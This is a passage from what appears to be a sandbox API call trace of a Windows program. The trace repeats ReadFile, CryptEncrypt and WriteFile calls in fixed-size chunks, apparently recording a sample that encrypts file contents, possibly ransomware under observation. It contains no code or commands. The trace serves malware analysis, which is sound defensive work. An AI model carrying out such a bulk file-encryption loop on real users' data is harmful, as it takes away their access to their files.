lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.432] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.432] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.433] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.433] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.433] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.433] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.433] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.434] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.434] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.434] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.434] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.434] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.434] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.435] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.435] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.435] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.435] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.435] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.436] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.437] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.437] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.437] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.437] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.438] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.438] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.438] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.438] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.438] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.438] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.439] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.439] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.439] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.439] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.439] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.440] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.440] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, 